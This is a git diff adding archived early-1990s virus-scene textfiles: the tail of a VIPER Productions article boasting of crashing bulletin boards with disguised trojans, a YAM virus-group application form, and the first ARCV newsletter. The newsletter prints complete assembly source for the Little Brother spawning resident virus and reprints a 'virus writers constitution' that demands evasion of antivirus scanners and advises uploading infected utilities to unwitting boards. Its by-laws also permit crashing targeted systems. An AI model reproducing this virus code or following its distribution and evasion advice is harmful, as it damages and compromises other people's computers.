figuring I can get myself a few nice and +obscure utilities like LZEXE and so on and so forth. After downloading some +nice french utilities, I realize that the board is a religious board, sponsered +by some church. Yes, the kind of religious board that carries the Adam's Rib +echo, and has an online "game" called 'The Beast' which finds the numerical hex +value of any word you type in . +This sickens me, as I am an agnostic who believes that religion should not mix +with modeming. Of course there's only one thing to do. I shell to DOS, unzip +'WHALE.ZIP' from my \NASTY directory, rename it 'JONAH.EXE' , go into the VIPER Trojan Horse Construction +Kit, create a fake 'JONAH.DAT' file of about 48k length, and write up a +'JONAH.DOC' file which goes a little something like this... + +"Thanks for downloading 'Jonah and the Whale' from your local bulletin board +system! Here are the instructions of the game. Simply make sure the JONAH.EXE +and JONAH.DAT files are in the same directory, and then type 'JONAH'. It's as +easy as that! +How to Play: +Simply use the arrow keys to help Jonah avoid the whale. + +VGA/EGA/CGA SB/Adlib support +Please send me money! Mathurin Picard 1234 fake address" + +And all of that spiel. For those of you not up on your 1600s history, Mathurin +Picard was a chaplain who raped nuns in convents, and nailed babies to crosses. +See what King Diamond can teach ya? Well, I zipped the file and uploaded it +as a "keen shareware game!", and then logged off. Here it is, 3 days later. +Does any of the board's lines answer??????? I didn't think so. Score one for +the ol' Weed. +-------------------------------------------------------------------------------- +Ok now I pose the question to you.. is what I did chronicled in the above lines +funny? Damn straight. Is it ironic? Of course!! Now here's the biggy.. is it +RIGHT? ooooh.. lets see why or why not, shall we? Take notes as this could +come in handy when your court date rolls around. First though, here's another +example or five.... +--------------------------------------------------------------------------------- +Case the Second. +There's another board in Illinois, called Solitary Confinement {708-328-0187}, +a so called "ELITE" board. Now, I kinda know the SysOp, his name is madman, +and he's a nice guy and all. But, he has a 486 25, with an 80 meg hard drive. +And here comes the biggy-- 13 of those 80 megs WERE filled with GIFs. And they +WEREN'T the mickey mouse ones, either. Now, GIFs kind of really sicken me, +although I DID go through that phase where I'd DL the latest 700k GRASPRT etc. +etc., but who hasn't???? To help usher madman through this phase, I decided to +do something. He stupidly gave me cosysop accesss, and was pretty stingy on +the security. So I simply wrote up a fake Telegard utility, called TG25SYS, +promising to remove all bugs from TG2.5i . So, what this trojan did was when activated, display a " Determining +Telegard Version Number..." while deleting all of the GIFs, and then "Telegard +2.5i version found! Rebuilding BBS.OVR file..." while it constructed a 14 meg +text file with the string "Get a life and a new keyboard- this one's too crusty +because of your GIFs" or something to that extent repeated quite a bit. Then, +it put a loving "At TIME$ on DATE$ you were buttfucked up the ass with a +broomstick" in his system logs. Ah.... that's two....... +-------------------------------------------------------------------------------- +Jeez, what a hellion I am ;). And the final example...... +-------------------------------------------------------------------------------- +Case the Final. +There's yet ANOTHER board, this time in Wisconsin, called Pit of Urine. I don't +have the number in my dialing directory, but oh well. The case here was simple. +It was a wa/>eZ board, and the only thing worse than a wa/>eZ board is a 2400 +baud wa/>eZ board. And it was one of those. So, I called, and uploaded ye +olde Viperizer . Now, the board is down. Ta-dahh. +...that's three... +-------------------------------------------------------------------------------- + +Now that I've recited to you the facts , here's what I've +come up with. + +1) I asked myself, before crashing these boards, three questions. + a) Do they deserve it? + b) Why? + c) Do they have any way of finding out it was me? + +2) The only boards worth crashing are those that misuse our Ambrosia, + knowledge. They do this by.. + a) promoting unfounded beliefs + b) using the knowledge to get sexual gratification + c) devoting their life to such mind candy as Wing Commander II etc at 2400 + +In essence, crashing boards in these fashions is a sort of Cyberpunk Euthanasia +for us. I do it because I believe that these people are misusing knowledge, +and if they continue to do so, it will result in harm to themselves and others +. Others just do it for fun. And that is to be +respected, cause, hey all, lets face it. There's nothing more gratifying than +persuading a lamer board's SysOp's little brother or sister into giving you +SysOp access, resulting in the board's demise. Now if only they'd figure out +a way to allow us to see the sysop's face........ + +-----> + + If you wanna contact us for any reason whatsoever, you can mail us at... + + stingray@pro-nbs.cts.com + +Copyright(c) 1992, VIPER Productions. + \ No newline at end of file diff --git a/textfiles.com/virus/apply.yam b/textfiles.com/virus/apply.yam new file mode 100644 index 00000000..8ceb659c --- /dev/null +++ b/textfiles.com/virus/apply.yam @@ -0,0 +1,195 @@ + + YAM - [ Youths Against McAffee ] + + +Revised Application Form + + +Position(s) Applying For: + + +Programming Positions Available: +_Virus Programmer [Check All That Apply: _ASM _PAS _C _Other _______] +_Trojan Programmer [Check All That Apply: _ASM _PAS _C _Other _______] +_General Programmer [Check All That Apply: _ASM _PAS _C _Other _______] + (ie. Magazine, Misc. Utilities, etc) + +Misc. Positions Available: +_Courier [I Will Courier: _LD _Local _PD] +_Site Sysop [Modem: _14.4 _2400 _16.8 _Other: _______] + [Hardware: _486 _386 _286 _Other: ________] + [ (HD) _40 _120 _240 _Other: ________] + [# Lines: _1 _2 _3 _Other: ________] + [Acting As Site For: _________________________] + [ (Groups us your board as site)] +_Donator [Total # Virii/Trojans/Sources: ______________] +_Ansi/VGA Artist [Check All That Apply: _Ansi _VGA] + + +I Want To Join YAM Because: + +- +- +- +- +- + + +Have You Ever Previously Released/Programmed Any Virii/Trojans? + +- +If Yes, Which One(s)? +- + + +Rarest Virii/Trojans In Your Collection: + +- +- +- +- +- + + +Rarest Source Codes In Your Collection: + +- +- +- + + +Personal Information: + + +Alias/Handle Used: +Real Name: +Real Phone Number [ Voice ] : + [ Data ] : +Address: +City: +Province/State: +Country: +Postal Code: + +Past Alias/Handles Used: + +Have You Ever Been Blacklisted?: + -If Yes, Why?: + : + +Occupation: +(Do You Have Access To Any Classified Computers, Networks, etc) + +Personal Knowledge Section: + + +Do You Phreak?: +How?: + : + +Do You Crack?: +How?: + : + +Do You Hack?: +How?: + : + +Are You An Anarchist?: +What Does Anarchy Mean To You?: + : + : +What Have You Done Lately That Makes You An Anarchist?: + : + : + : + +What Is A Virus?: +What Is The Difference Between A Virus & A Trojan?: +How Would You Compile A Souce Code (Written In ASM): + : +How Would You Dissasemble A Source Code (Written In ASM): + : +What Do You Think Is The Purpose Of Writing A Virus/Trojan?: + : + : + + +References Area: + + +Personal References: (Include Their Area Codes, & Where They Can Be Reached) +- +- +- +- +- + +Do You Know Any YAM Members? [ Past/Present ]: + -If Yes, Which One(s): + : + +What Do You Think About The Programming & Distribution Of Virii/Trojans?: + + +- +- + +In Your Opinion What Is The Best Virus or Trojan Ever Made? Why?: + +- +- +- + +If You Do Program, Give Us An Example Of Your Talents: + +- (Include Source Code, or Compiled File With Application) + + +Define: + +YAM: +RABID: +SKISM: +NuKE: +CPI: +BvX: +PHAC: +MtE: +VMB: +PBX: + +Explain: + +40-Hex: +PBX: (Don't Re-Define It) +Blue Box: +Red Box: +Diverter: +Loop: +XOR: +Scan String: + + +Are You Involved With The RCMP, Any Police Division, Any Phone Company, Any +Software Company, Any Computer Company, Any Investigative Bureau, Or Any +Government Funded Projects?: _YES _NO +If Yes, Which One(s)?: + + + Sign Your Alias/Handle Here: + Sign Your Real Name Here: + Sign Your Real Voice Phone Number Here: + +I understand that by signing the above, I am legally binding myself to uphold +the YAM name and to do my best to further the distribution of virii/trojans +around the world. _YES _NO + + +******* Now Call Any YAM Distribution Site, or Any BBS With A YAM Member On + *** It And Use PRIVATE E-MAIL To Send Them Your Filled In Application +******* Form. (eg. Natas Kaupas (YAM Head) TFM)) + + -NK -YAM + [YAM] Youngsters Against McAffee + \ No newline at end of file diff --git a/textfiles.com/virus/arcvnews01.txt b/textfiles.com/virus/arcvnews01.txt new file mode 100644 index 00000000..1bfc02c1 --- /dev/null +++ b/textfiles.com/virus/arcvnews01.txt @@ -0,0 +1,1352 @@ + + The + + + + + The Association of Really Cruel Viruses.Ŀ + + + + Welcome to the first ARCV Newsletter.... + + We hope you are all having a Spiffing Time out there.... + + First lets introduce the 'Team'. + + The Keyboard Basher - Apache Warrior. + The Other One - ICE-9. + + Well you may or may not know that we here are one the only Truly + English Computer Underground Organisation (And just to piss off the + Americans Out there we will spell everything with an 's' not a 'z'). + In this and future newsletters we will be dodging Special Branch and + New Scotland Yard as we go, as well as putting in the odd virus ASM + file, Debug Dump for you all to have fun with. We will also provide + information on what's happening (DUDE) out there in Computer Land. + + Contents. + + 000..........................................................Contents. + 001...................................Virus Spotlight, Little Brother. + 002............................................ARCV Application Forms. + 003.........................What is The ARCV, and Who are its Members. + 004.....................................................Ontario Virus. + 005......................................................Sunday Virus. + 006...........................................................Closing. + + The file in the Archive ARCVVIR.COM is a self displaying List of all + the ARCV Viruses we have produced. (Requires ANSI.SYS) + + + Greetings...To + The Guy Who Wrote CHAOS - Thanks Bud + The Guy Who Wrote FU MANCHU - Are you English? + Patti 'VSUM' Hoffman - We are here to make your Life HELL! + John McAfee - To Think if wasn't for us you'd be Unemployed + The Guy Who Wrote MICHELANGELO - Geta LIFE!!!!!!!!!!!!! + Terry Pratchett - You Are COOOOOOOOL! + And Are Carnivorous Plants Really that Boring? + + +ARCV NEWS 001. + + - Virus Spotlight - + + Little Brother. + + Now this virus, is rather crafty as is relies on good old MSDOS +program handling to work, ie. The Fact that .COM files are allways load +before .EXE files. First lets see what Patti has to say. + + Virus Name: Little Brother + Aliases: + V Status: Rare + Discovered: October, 1991 + Symptoms: 307 byte .COM files + Origin: The Netherlands + Eff Length: 307 Bytes + Type Code: SRCE - Spawning Resident .EXE Infector + Detection Method: ViruScan, AVTK 5.54+, F-Prot 2.03+, Novi 1.1d+ + Removal Instructions: Delete infected .COM programs + + General Comments: + The Little Brother virus was submitted from the Netherlands in +October, 1991. This virus is a spawning virus similar in technique to the +Aids 2 and Twin-351 viruses. + + The first time a program infected with Little Brother is executed, +Little Brother will become memory resident in a "hole" in low system memory +in the system data area, hooking interrupt 21. There will be no change in +total system or available free memory. + + Once resident, the Little Brother virus will infect .EXE programs when +they are executed. The .EXE program itself will not be altered, but a +corresponding .COM program will be created by the virus of 307 bytes. This +corresponding.COM program will contain pure virus code and have a date/time +stamp in the DOS directory of when it was created. The following text +strings can be found in the 307 byte .COM files: + + "Little Brother" + "EXE COM" + + Since DOS will execute .COM programs before .EXE programs, whenever +the user attempts to execute a .EXE program, the corresponding .COM program +will be executed first. The .COM program, when finished will then start +the .EXE program the user was attempting to execute. + + Well lets get to the Asm source. +--------------------------------------------------------------------------- +cseg segment + assume cs:cseg,ds:cseg,es:nothing + + org 100h + +FILELEN equ quit - begin +RESPAR equ (FILELEN/16) + 17 +VER_ION equ 1 +oi21 equ quit +nameptr equ quit+4 +DTA equ quit+8 + + .RADIX 16 + + +;************************************************************************** +;* Start the program! +;************************************************************************** + +begin: cld + + mov ax,0DEDEh ;already installed? + int 21h + cmp ah,041h + je cancel + + mov ax,0044h ;move program to empty hole + + mov es,ax + mov di,0100h + mov si,di + mov cx,FILELEN + rep movsb + + mov ds,cx ;get original int21 vector + + mov si,0084h + mov di,offset oi21 + movsw + movsw + + push es ;set vector to new handler + + pop ds + mov dx,offset ni21 + mov ax,2521h + int 21h + +cancel: ret + + +;************************************************************************** +;* File-extensions +;************************************************************************** + +EXE_txt db 'EXE',0 +COM_txt db 'COM',0 + +;************************************************************************** +;* Interupt handler 24 +;************************************************************************** +ni24: mov al,03 + iret + +;************************************************************************** +;* Interupt handler 21 +;************************************************************************** + +ni21: pushf + + cmp ax,0DEDEh ;install-check ? + je do_DEDE + + push dx + push bx + push ax + push ds + push es + + cmp ax,4B00h ;execute ? + jne exit + +doit: call infect + +exit: pop es + pop ds + pop ax + pop bx + pop dx + popf + + jmp dword ptr cs:[oi21] ;call to old int-handler + +do_DEDE: mov ax,04100h+VER_ION ;return a signature + popf + iret + + +;************************************************************************** +;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) +;************************************************************************** + +infect: cld + + mov word ptr cs:[nameptr],dx ;save the ptr to the + ;filename + mov word ptr cs:[nameptr+2],ds + + push cs ;set new DTA + pop ds + mov dx,offset DTA + mov ah,1Ah + int 21 + + call searchpoint + mov si,offset EXE_txt ;is extension 'EXE'? + mov cx,3 + rep cmpsb + jnz do_com + +do_exe: mov si,offset COM_txt ;change extension to COM + call change_ext + + mov ax,3300h ;get ctrl-break flag + int 21 + push dx + + xor dl,dl ;clear the flag + mov ax,3301h + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + push cs ;set int24 vec to new handler + pop ds + mov dx,offset ni24 + mov ax,2524h + int 21 + + lds dx,dword ptr [nameptr] ;create the file (unique + ;name) + xor cx,cx + mov ah,5Bh + int 21 + jc return1 + xchg bx,ax ;save handle + + push cs + pop ds + mov cx,FILELEN ;write the file + mov dx,offset begin + mov ah,40h + int 21 + cmp ax,cx + pushf + + mov ah,3Eh ;close the file + int 21 + + popf + jz return1 ;all bytes written? + + lds dx,dword ptr [nameptr] ;delete the file + mov ah,41h + int 21 + +return1: pop ds ;restore int24 vector + pop dx + mov ax,2524h + int 21 + + pop dx ;restore ctrl-break flag + mov ax,3301h + int 21 + + mov si,offset EXE_txt ;change extension to EXE + call change_ext + +return: ret + +do_com: call findfirst ;is the file a virus? + cmp word ptr cs:[DTA+1Ah],FILELEN + jne return + mov si,offset EXE_txt ;does the EXE-variant +exist? + call change_ext + call findfirst + jnc return + mov si,offset COM_txt ;change extension to COM + jmp short change_ext + + +;************************************************************************** +;* Find the file +;************************************************************************** + +findfirst: lds dx,dword ptr [nameptr] + mov cl,27h + mov ah,4Eh + int 21 + ret + + +;************************************************************************** +;* change the extension of the filename (CS:SI -> ext) +;************************************************************************** + +change_ext: call searchpoint + push cs + pop ds + movsw + movsw + ret + + +;************************************************************************** +;* search begin of extension +;************************************************************************** + +searchpoint: les di,dword ptr cs:[nameptr] + mov ch,0FFh + mov al,'.' + repnz scasb + ret + + +;************************************************************************** +;* Text and Signature +;************************************************************************** + + db 'Little Brother',0 + +quit: + +cseg ends + end begin + + Quite a Simple idea for a virus but it works. + + Apche.ARCV NEWS 002. + + Well I thought it could be a good idea if I put in the relevant ARCV +Application forms for any one who may wish to join the ranks of the ARCV. +At the moment we are looking for MAC Virus programmers, and AMIGA Virus +Programmers and others. Also we are looking Couriers for the ARCV (BBS's +for Distribution), that are based all over the world in Britain, USA and +Eastern Europe Mainly but other countries will get equal consideration. so +less of the waffle and to the Applications. + +--------------------------------------------------------------------------- +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + + /////// //////// ///////// // // + // // // // // // // + /////// /////// // // // + // // // // // // // + // // * // // * ///////// * /// + + + THE + ASSOCIATION + OF REALLY + CRUEL + VIRUSES + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + The Association of Really Cruel Viruses + + Courier and/or Membership Application Form + + + For any purpose other than to evaluate this application, the data in all + sections of this application shall not be disclosed outside the internal + leadership of the ARCV. For more ARCV information please see ARCV + prologue. + +--------------------------------------------------------------------------- + + FALSE STATEMENT: A person is guilty of False Statement when he/she + Intentionally makes a false statement under oath or + pursuant to a form bearing Notice. + + You are here to fore-warned... + + FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!! +--------------------------------------------------------------------------- + + PART A: Background Information + + + 1. Date of Application:__________________________________ + + 2. Applicants Name (Last,First,Middle,Maiden): + + ______________________________________________________ + + 3. Applicants Current Handle:____________________________ + + 4. List all other Handles by which you have been known. + + ______________________________________________________ + + ______________________________________________________ + + 5. Residence Address (Number,Street,City or Town,County and Post Code): + + _______________________________________________________ + + _______________________________________________________ + + _______________________________________________________ + + 6. Home Telephone Number (Area Code and Number): + + _______________________________________________________ + + 7. Home Data Number (Area Code and Number): + + _______________________________________________________ + + 8. Fidonet Contact address (full address, including name to contact): + + _______________________________________________________ + + _______________________________________________________ + + 9. Age:__________ Date of Birth:_________________________ + + 10. Marital Status: ___ Married ___ Separated + + ___ Single ___ Divorced + + 11. Nationality __________________________________________ + + 12. Have you at any time used a virus? YES/NO ____________ + + If Yes, explain: _____________________________________ + + ______________________________________________________ + + ______________________________________________________ + + 13. Have you at any time been the victim of a virus attack? + + YES/NO _________________ + + If yes, explain: _____________________________________ + + ______________________________________________________ + + ______________________________________________________ + + + Part B: Legal Information + + + 1. Have You ever been convicted in any court of a crime + punishable by imprisonment for a term exceeding 1 year? + + No _____ + + Yes ____ If yes, explain: _____________________________ + + _______________________________________________________ + + _______________________________________________________ + + 2. Are you currently on Probation,Parole,a Work-Release Program + or Released on Personal Recognizance or Bond Pending Court Action? + + No _____ + + Yes ____ If yes, explain: ______________________________ + + _______________________________________________________ + + _______________________________________________________ + + 3. Are you Now or ever have been a member of any form of + Law Enforcement Agency, Such as: FBI,Secret Service,NSA, + CIA,BATF,State or Local Police,Special Branch etc.? + + No _____ + + Yes ____ If yes, explain: _____________________________ + + _______________________________________________________ + + _______________________________________________________ + + 4. Are you Now or ever have been a member of any form of + group that investigates the Computer Underground? + Such as: Software Publishers Association,etc. + + No _____ + + Yes ____ If yes, explain: _____________________________ + + _______________________________________________________ + + _______________________________________________________ + + 5. Do you belong To any Organized Computer Club or Group? + + No _____ + + Yes ____ If yes, explain: _____________________________ + + _______________________________________________________ + + _______________________________________________________ + + + Part C: ARCV Information + + + 1. Are you applying to be: + + An ARCV Member __________ + + An ARCV Courier __________ + + Both __________ + + 2. If applying to be a member, Explain in detail your reason for wanting + to be a member of the ARCV. + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + 3. What kind of position do you wish to hold in the ARCV? + + ____________________________________________________________________ + + ____________________________________________________________________ + + ____________________________________________________________________ + + Part D: Qualifications + + 1. Which Programming languages do you know WELL? (Place X in Boxes) + + [ ] Assembler + [ ] Basic + [ ] Cobol + [ ] C (Turbo, Ansi) + [ ] Fortran + [ ] Pascal (Turbo, Others) + + 2. Which Programming languages are you familiar which (Place x in Boxes) + + [ ] Assembler + [ ] Basic + [ ] Cobol + [ ] C (Turbo, Ansi) + [ ] Fortran + [ ] Pascal (Turbo, Others) + + 3. Have you ever written a virus? (No Trojans Please) + + No _______ + + Yes ______ If yes, explain: ___________________________ + + _______________________________________________________ + + _______________________________________________________ + + _______________________________________________________ + + 4. If you answered NO to the above DON'T answer this... + Has the virus you've written in the Public Domain? + (ie. Is it released?) + + No _______ + + Yes ______ If yes, explain: ___________________________ + + _______________________________________________________ + + _______________________________________________________ + + _______________________________________________________ + + 5. If you've written a virus are you willing for it to be placed in our + virus library? + + No _______ + + Yes ______ + + 6. Do you have a virus collection? + + No _______ + + Yes ______ If yes, explain (Please included number in collection) + + _______________________________________________________ + + _______________________________________________________ + + _______________________________________________________ + + ________________________________________________________ + + ARCV By-Laws: +--------------------------------------------------------------------------- + Section 1A-1 + + ALL MEMBERS OF THE ARCV MUST SUBSCRIBE TO THE HACKERS ETHIC AS DEFINED + BY THE EARLY CRAFTERS OF THE ART. (See Appendix A) ALSO YOU MUST SUBSCRIBE + TO THE VIRUS WRITERS CONSTITUTION. (See Appendix B) +--------------------------------------------------------------------------- + Section 1a-2 + + DEFENSE OF COPARTICIPANTS IN OFFENSE WITH A COMPUTER + + In any prosecution for any Crime under Law, in which the member was not + the only participant, it shall be recognized that no ARCV + member shall provide information on any current ARCV member to any + member of the Media or Law Enforcement Agencies. + +--------------------------------------------------------------------------- + Section 1a-3 + + USE OF DEADLY HACKING FORCE + + Except as provided in these sub-sections, No ARCV member shall ever damage + delete or in any way tamper with a computer network or system. + + Exception 1a-3-1 : Any BBS or system posting or providing Anti-ARCV + propaganda may be crashed or deleted. + + Exception 1a-3-2 : Any BBS or system posting or providing any ARCV members + phone numbers,Password, or personal information may be + crashed or deleted. + + Exception 1a-3-3 : Any system so approved by the ARCV Council. + +--------------------------------------------------------------------------- + + Section 1a-4 + + DISCLOSURE OF PROPRIETARY INFORMATION + + No ARCV member shall distribute confidential ARCV information. + This shall include: Disks,Programs,Files,Passwords or Codes,Paperwork, + Manuals,Documents to any Non ARCV member,Media Member, or Law Enforcement + Agency, Without the prior permission of the ARCV Council. + +--------------------------------------------------------------------------- + + Section 1a-5 + + CONTRIBUTION OF INFORMATION + + All ARCV Members are expected to contribute to the ARCV as a whole, and + to provide information obtained on their own. Members shall not just + use information provided by other members or non-members. + +--------------------------------------------------------------------------- + + Section 1a-6 + + DISCLOSURE OF MEMBERSHIP + + All ARCV members will not allow any Non-member to use his/her password, + ID,Handle or name. And No member shall post or provide any members name + password or phone number on any computer system without the prior consent + of said member. All members will leave his/her name or phone number on a + system or network at their own discretion and risk. + +--------------------------------------------------------------------------- + + APPENDIX A: + + 1. All Information should be FREE! + + 2. Promote Decentralization - Mistrust Authority + + 3. Access to computers should be unlimited and Total + + 4. Hackers should be judged by their hacking ability + + 5. You can create art and beauty on a computer + + 6. Computers can change your life for the better. +___________________________________________________________________________ + + APPENDIX B: *** + + The Constitution of Worldwide Virus Writers + + Initial Release - February 12, 1992 + + + ARTICLE I - REGARDING ORIGINAL VIRII + Section A - DEFINITION + The term "original virus" herein indicates programming done + exclusively by either one individual or group, with no code + taken from any other source, be it a book or another virus. + Section B - CODE REQUIREMENTS + For an original virus to conform to the standards set by + this document, it must include the following: + 1) The title of the virus in square brackets followed by a + zero byte should be in the code, in a form suitable for + inclusion into SCAN(1). This is to ensure that the + name of the virus is known to those examining it. + 2) The name of the author and his/her group affiliation/s + should be included in the code, followed by a zero + byte. At the present, this is an optional requirement. + 3) Some form of encryption or other form of stealth + techniques must be used. Even a simple XOR routine + will suffice. + 4) If the virus infects files, the code should be able to + handle infection of read only files. + 5) It must have some feature to distinguish it from other + virii. Creativity is encouraged above all else. + 6) The virus must not be detectable by SCAN. + Section C - IMPLEMENTATION + This section, and all sections hereafter bearing the heading + "IMPLEMENTATION" refer to the recommended method of + implementation of the suggestions/requirements listed in the + current article. + 1) Virus_Name db '[Avocado]',0 + 2) Author db 'Dark Angel, PHALCON/SKISM',0 + + ARTICLE II - REGARDING "HACKED" VIRII + Section A - DEFINITION + The term "hacked virus" herein refers to any virus written + by either one individual or a group which includes code + taken from any other source, be it a book, a code fragment, + or the entire source code from another virus. + The term "source virus" herein refers to the virus which + spawned the "hacked virus." + Section B - CODE REQUIREMENTS + For a "hacked" virus to conform to the standards set forth + by this document, it must include the following, in addition + to all the requirements set down in Article I of this + document: + 1) The title, author (if available), and affiliation of + the author (if available) of the original virus. + 2) The author of the hacked virus must give the source + code of said virus to the author of the source virus + upon demand. + 3) No more Jerusalem, Burger, Vienna, Stoned, and Dark + Avenger hacks are to be written. + 4) The source virus must be improved in some manner + (generally in efficiency of speed or size). + 5) The hacked virus must significantly differ from the + source virus, i.e. it cannot be simply a text change. + Section C - IMPLEMENTATION + 1) Credit db 'Source stolen from Avocado by Dark Angel of + PHALCON/SKISM',0 + ARTICLE III - REGARDING VIRAL STRAINS + Section A - DEFINITION + The term "viral strain" herein refers to any virus written + by the original author which does not significantly differ + from the original. It generally implies a shrinking in code + size, although this is not required. + Section B - CODE REQUIREMENTS + For a "viral strain" to conform to the standards set by this + document, it must include the following, in addition to all + the requirements set down in Article I of this document: + 1) The name of the virus shall be denoted by the name of + the original virus followed by a dash and the version + letter. + 2) The name of the virus must not change from that of the + original strain. + 3) A maximum of two strains of the virus can be written. + Section C - IMPLEMENTATION + 1) Virus_Name db '[Avocado-B]',0 + + ARTICLE IV - DISTRIBUTION + Section A - DEFINITION + The term "distribution" herein refers to the transport of + the virus through an infected file to the medium of storage + of a third (unwitting) party. + Section B - INFECTION MEDIUM + The distributor shall infect a file with the virus before + uploading. Suggested files include: + 1) Newly released utility programs. + 2) "Hacked" versions of popular anti-viral software, i.e. + the version number should be changed, but little else. + 3) Beta versions of any program. + The infected file, which must actually do something useful, + will then be uploaded to a board. The following boards are + fair game: + 1) PD Boards + 2) Lamer boards + 3) Boards where the sysop is a dick + No virus shall ever be uploaded, especially by the author, + directly to an antivirus board, such as HomeBase or + Excalibur. + Section C - BINARY AND SOURCE CODE AVAILABILITY + The binary of the virus shall not be made available until at + least two weeks after the initial (illicit) distribution of + the virus. Further, the source code, which need not be made + available, cannot be released until the latest version of + SCAN detects the virus. The source code, should it be made + available, should be written in English. + Section D - DOCUMENTATION + Documentation can be included with the archive containing + the binary of the virus, although this is optional. The + author should include information about the virus suitable + for inclusion in the header of VSUM(2). A simple + description will follow, though the author need not reveal + any "hidden features" of the virus. Note this serves two + purposes: + 1) Enable others to effectively spread the virus without + fear of self-infection. + 2) Ensure that your virus gets a proper listing in VSUM. + ARTICLE V - AMENDMENTS + Section A - PROCEDURE + To propose an amendment, you must first contact a + PHALCON/SKISM member through one of our member boards. + Leave a message to one of us explaining the proposed change. + It will then be considered for inclusion. A new copy of the + Constitution will then be drafted and placed on member + boards under the filename "PS-CONST.TXT" available for free + download by all virus writers. Additionally, an updated + version of the constitution will be published periodically + in our newsletter. + Section B - AMENDMENTS + None as of this writing. + + ARTICLE VI - MISCELLANEOUS + Section A - WHO YOU CAN MAKE FUN OF + This is a list of people who, over the past few years, have + proved themselves to be inept and open to ridicule. + 1) Ross M. Greenberg, author of FluShot+ + 2) Patricia (What's VSUM?) Hoffman. + 2) People who post "I am infected by Jerusalem, what do I + do?" or "I have 20 virii, let's trade!" + 3) People who don't know the difference between a virus + and a trojan. + 4) Lamers and "microwares puppies" + Section B - WHO YOU SHOULDN'T DIS TOO BADLY + This is a list of people who, over the past few years, have + proved themselves to be somewhat less inept and open to + ridicule than most. + 1) John McAfee, nonauthor of SCAN + 2) Dennis, true author of SCAN + Section C - MOTIVATION + In most cases, the motivation for writing a virus should not + be the pleasure of seeing someone else's system trashed, but + to test one's programming abilities. + + + + + 1 SCAN is a registered trademark of McAfee Associates. + 2 VSUM is a registered trademark of that bitch who doesn't know her own + name. +___________________________________________________________________________ + + For those applying for courier membership if we feel you are suitable we + will be in touch to discus the extra details. The usual first contact + will be by means of a Fidonet address or a written letter. + + For those applying for normal membership then will contact you at your + Fidonet address, with the extra details of the membership and a list of + board that's we can be contacted through. +___________________________________________________________________________ + + FALSE STATEMENT: A person is guilty of False Statement when he/she + Intentionally makes a false statement under oath or + pursuant to a form bearing Notice. + + You are here to fore-warned... + + FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!! + + + I agree to the By-Laws and statements put forth on this document + + NAME: _______________________________ + + DATE: _______________________________ + + To return your Application please return to Apache Warrior. Through E- +Mail on any Flashback BBS or the BBS where you got this from. + + Please fill in the Machine Configuration data sheet and return to the + above address. + +*** + PS. Thanks to PHALCON/SKISM for preparing the Virus Writers Constitution. +*** + +--------------------------------------------------------------------------- +The ARCV'92 +May the Great A'Tuin keep going........ +--------------------------------------------------------------------------- + + Well that's the Application form next is the machine spec. form. This +gives us an indication of the kind of computer system you run. + +--------------------------------------------------------------------------- +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + /////// //////// ///////// // // + // // // // // // // + /////// /////// // // // + // // // // // // // + // // * // // * ///////// * /// + + + THE + ASSOCIATION + OF REALLY + CRUEL + VIRUSES + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + The Association of Really Cruel Viruses. + + Machine Configuration Form. + + Please fill in all the questions truthfully as they will help us decide +what you can offer our group. +___________________________________________________________________________ + + + 1. Date of Application:__________________________________ + + 2. Applicants Name (Last,First,Middle,Maiden): + + ______________________________________________________ + + 3. Applicants Current Handle:____________________________ + + 4. Machine Type. (Place an X in the boxes appropriate) + + [ ] IBM PC. + [ ] AMIGA. + [ ] ATARI ST. + [ ] MAC. + [ ] ARCHIMEDES. + [ ] OTHER, (Please State). + + 5. If you answered IBM PC to the above please answer below. What type + of IBM PC do you have. + + [ ] 8086/88 Based + [ ] 80286 Based + [ ] 80386 (SX/DX) Based + [ ] 80486 (SX/DX/DX2) Based + [ ] PS/2 + + 6. If you have a machine other than that of an IBM PC please state + processor type and manufacturer. + + _______________________________________________________________ + + _______________________________________________________________ + + _______________________________________________________________ + + 7. Do you have any of the following equipment. + + [ ] Hard Disk, enter size and type: ______________________________ + + ______________________________________________________________ + + [ ] Modem, enter model and max speed: ____________________________ + + ______________________________________________________________ + + [ ] Printer + [ ] 9 pin Dot Matrix + [ ] 24 pin Dot Matrix + [ ] Laser Printer + [ ] Ink Jet type + [ ] Colour + + [ ] Monochrome Display. + [ ] CGA Display, or equivalent. + [ ] EGA Display, or equivalent. + [ ] VGA Display, or equivalent. + [ ] SVGA Display, or equivalent. + + [ ] 5 inch 360K floppy. + [ ] 5 inch 1.2Mb floppy. + [ ] 3 inch 720Kb floppy. + [ ] 3 inch 1.44Mb floppy. + [ ] Other Please State: __________________________________________ + + 8. What Kind of Anti-Virus Software do you use: + + _______________________________________________________________ + + _______________________________________________________________ + + 9. Do you believe in Virus Research? YES/NO _______________________ + + 10. Do you Hack? YES/NO ___________________________________________ + + 11. If so what kind of Systems? ___________________________________ + + _______________________________________________________________ + + 12. Do you run a BBS? YES/NO ______________________________________ + + 13. If so please state BBS configuration. inc. Software, Machines. + + _______________________________________________________________ + + _______________________________________________________________ + + _______________________________________________________________ + + _______________________________________________________________ + + _______________________________________________________________ + + 14. If you have a BBS are you willing for us to us it? YES/NO _____ + +___________________________________________________________________________ + + This all for now and we may ask further questions regarding your computer + setups. Thank you for your time. +___________________________________________________________________________ + + FALSE STATEMENT: A person is guilty of False Statement when he/she + Intentionally makes a false statement under oath or + pursuant to a form bearing Notice. + + You are here to fore-warned... + + FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!! + + + I agree to the statements put forth on this document + + NAME: _______________________________ + + DATE: _______________________________ + + To return your 